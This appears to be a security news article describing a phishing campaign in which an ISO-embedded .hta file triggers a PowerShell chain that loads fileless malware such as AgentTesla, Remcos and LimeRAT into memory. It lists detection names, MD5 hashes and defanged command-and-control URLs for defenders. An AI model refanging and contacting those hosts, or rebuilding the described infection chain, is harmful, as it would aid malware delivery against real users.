Recent reports suggest threat actors have used phishing emails to distribute fileless malware. The attachment consists of a .hta (HTML Application) file, which can be used for deploying other malware like AgentTesla, Remcos, and LimeRAT.
This fileless malware is a Portable Executable (PE) format, which gets executed without creating the file on the victim’s system. The phishing email has the body context stating a bank transfer notice. In addition to the email, the email has an attachment with an ISO image embedded with a .hta script file. This file runs using the mshta.exe (Microsoft HTML Application).
As per reports shared with Cyber Security News, when the victims execute this ISO file, the embedded .hta file gets executed, which creates a process tree that consists of mshta.exe, cmd.exe, powershell.exe, and RegAsm.exe processes in order.
The mshta.exe process executes a Powershell command. The command consists of arguments to request a base64 encoded string type data from the server (DownloadString), which loads the CurrentDomain.Load data to call a function. However, there is no binary created into a PE file, but instead, the binary gets executed in the memory area of Powershell.
Furthermore, the Powershell script also executes a DLL file decoded from a Base64 string. This DLL downloads the final binary from the C2 server and injects it into the RegAsm.exe (Assembly Registration Tool). This final binary could be any malware like Remcos, AgentTesla, or LimeRAT.
A complete report has been published by AhnLab, which provides detailed information about the malware, PE file, DLL file, and others.
Behavior Detection
Connection/EDR.Behavior.M2650
Execution/MDP.Powershell.M10668
File Detection
Downloader/Script.Generic
Trojan/Win.Generic.R526355
URL & C2
hxxps[:][/][/]cdn[.]pixelbin[.]io[/]v2[/]red-wildflower-1b0af4[/]original[/]hta[.]txt
hxxp[:][/][/]195[.]178[.]120[.]24[/]investorbase64[.]txt
MD5
43e75fb2283765ebacf10135f598e98c (.hta)
540d3bc5982322843934504ad584f370 (.dll)
Keep informed about the latest Cyber Security News by following us on Google News, Linkedin, Twitter, and Facebook.
British Columbia's government has confirmed a sophisticated attempt to infiltrate its information systems. Premier David…
Security researchers have uncovered a new technique called "TunnelVision" that exposes a fundamental flaw in…
A sophisticated malware campaign has been identified, specifically targeting Windows and Microsoft Office users through…
Hackers take advantage of sponsored Google Ads as they provide an excellent chance to reach…
F5 Big IP has been discovered with two critical vulnerabilities that could potentially allow a…
Accenture Federal Services (AFS), a subsidiary of global professional services company Accenture (NYSE: ACN), has…